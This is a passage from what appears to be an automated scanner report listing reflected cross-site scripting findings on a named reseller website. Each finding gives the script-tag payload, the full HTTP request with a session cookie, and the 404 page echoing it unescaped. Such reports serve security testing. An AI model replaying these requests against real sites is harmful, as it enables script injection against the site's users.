2.5443. http://www.resellerbase.com/web-service/themes/kosmos/images/review/0.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d93a2<script>alert(1)</script>6e1ed5669a0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-serviced93a2<script>alert(1)</script>6e1ed5669a0/themes/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-serviced93a2<script>alert(1)</script>6e1ed5669a0/themes/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.5444. http://www.resellerbase.com/web-service/themes/kosmos/images/review/0.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cdaed<script>alert(1)</script>2643be32dcc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themescdaed<script>alert(1)</script>2643be32dcc/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themescdaed<script>alert(1)</script>2643be32dcc/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.5445. http://www.resellerbase.com/web-service/themes/kosmos/images/review/0.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 21ed6<script>alert(1)</script>9c3ce00f252 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos21ed6<script>alert(1)</script>9c3ce00f252/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos21ed6<script>alert(1)</script>9c3ce00f252/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.5446. http://www.resellerbase.com/web-service/themes/kosmos/images/review/0.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 347fd<script>alert(1)</script>cc6c4c6a652 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images347fd<script>alert(1)</script>cc6c4c6a652/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images347fd<script>alert(1)</script>cc6c4c6a652/review/0.gif was not found on this server.</p>
...[SNIP]...

2.5447. http://www.resellerbase.com/web-service/themes/kosmos/images/review/0.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 45f7e<script>alert(1)</script>aac3d10fcf2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images/review45f7e<script>alert(1)</script>aac3d10fcf2/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/review45f7e<script>alert(1)</script>aac3d10fcf2/0.gif was not found on this server.</p>
...[SNIP]...

2.5448. http://www.resellerbase.com/web-service/themes/kosmos/images/review/0.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload fdb16<script>alert(1)</script>d33a21c73f7 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images/review/0.giffdb16<script>alert(1)</script>d33a21c73f7 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/review/0.giffdb16<script>alert(1)</script>d33a21c73f7 was not found on this server.</p>
...[SNIP]...

2.5449. http://www.resellerbase.com/web-service/themes/kosmos/images/review/0.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/review/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 652e0<script>alert(1)</script>ff6e15ab805 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images/review/0.gif?652e0<script>alert(1)</script>ff6e15ab805=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/review/0.gif?652e0<script>alert(1)</script>ff6e15ab805=1 was not found on this server.</p>
...[SNIP]...

2.5450. http://www.resellerbase.com/web-service/themes/kosmos/images/review/5.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d8e9c<script>alert(1)</script>68f334904ae was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-serviced8e9c<script>alert(1)</script>68f334904ae/themes/kosmos/images/review/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-serviced8e9c<script>alert(1)</script>68f334904ae/themes/kosmos/images/review/5.gif was not found on this server.</p>
...[SNIP]...

2.5451. http://www.resellerbase.com/web-service/themes/kosmos/images/review/5.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 86e1f<script>alert(1)</script>72cd647f278 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes86e1f<script>alert(1)</script>72cd647f278/kosmos/images/review/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes86e1f<script>alert(1)</script>72cd647f278/kosmos/images/review/5.gif was not found on this server.</p>
...[SNIP]...

2.5452. http://www.resellerbase.com/web-service/themes/kosmos/images/review/5.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8d79e<script>alert(1)</script>3c8af91605d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos8d79e<script>alert(1)</script>3c8af91605d/images/review/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos8d79e<script>alert(1)</script>3c8af91605d/images/review/5.gif was not found on this server.</p>
...[SNIP]...

2.5453. http://www.resellerbase.com/web-service/themes/kosmos/images/review/5.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload bc991<script>alert(1)</script>aaccda69e39 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/imagesbc991<script>alert(1)</script>aaccda69e39/review/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/imagesbc991<script>alert(1)</script>aaccda69e39/review/5.gif was not found on this server.</p>
...[SNIP]...

2.5454. http://www.resellerbase.com/web-service/themes/kosmos/images/review/5.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload cfb14<script>alert(1)</script>3c0fec4c1e5 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images/reviewcfb14<script>alert(1)</script>3c0fec4c1e5/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/reviewcfb14<script>alert(1)</script>3c0fec4c1e5/5.gif was not found on this server.</p>
...[SNIP]...

2.5455. http://www.resellerbase.com/web-service/themes/kosmos/images/review/5.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload bea71<script>alert(1)</script>91a5159231a was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images/review/5.gifbea71<script>alert(1)</script>91a5159231a HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/review/5.gifbea71<script>alert(1)</script>91a5159231a was not found on this server.</p>
...[SNIP]...

2.5456. http://www.resellerbase.com/web-service/themes/kosmos/images/review/5.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/review/5.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 63849<script>alert(1)</script>aee6cc06267 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images/review/5.gif?63849<script>alert(1)</script>aee6cc06267=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/review/5.gif?63849<script>alert(1)</script>aee6cc06267=1 was not found on this server.</p>
...[SNIP]...

2.5457. http://www.resellerbase.com/web-service/themes/kosmos/images/review/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7f094<script>alert(1)</script>8de005d4e1f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service7f094<script>alert(1)</script>8de005d4e1f/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service7f094<script>alert(1)</script>8de005d4e1f/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5458. http://www.resellerbase.com/web-service/themes/kosmos/images/review/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cbae9<script>alert(1)</script>ca467735dd8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themescbae9<script>alert(1)</script>ca467735dd8/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themescbae9<script>alert(1)</script>ca467735dd8/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5459. http://www.resellerbase.com/web-service/themes/kosmos/images/review/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 27639<script>alert(1)</script>9dd4f12d004 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos27639<script>alert(1)</script>9dd4f12d004/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos27639<script>alert(1)</script>9dd4f12d004/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5460. http://www.resellerbase.com/web-service/themes/kosmos/images/review/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5b397<script>alert(1)</script>41beb6efb2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images5b397<script>alert(1)</script>41beb6efb2/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images5b397<script>alert(1)</script>41beb6efb2/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5461. http://www.resellerbase.com/web-service/themes/kosmos/images/review/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 51e7b<script>alert(1)</script>41b67267523 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images/review51e7b<script>alert(1)</script>41b67267523/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/review51e7b<script>alert(1)</script>41b67267523/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

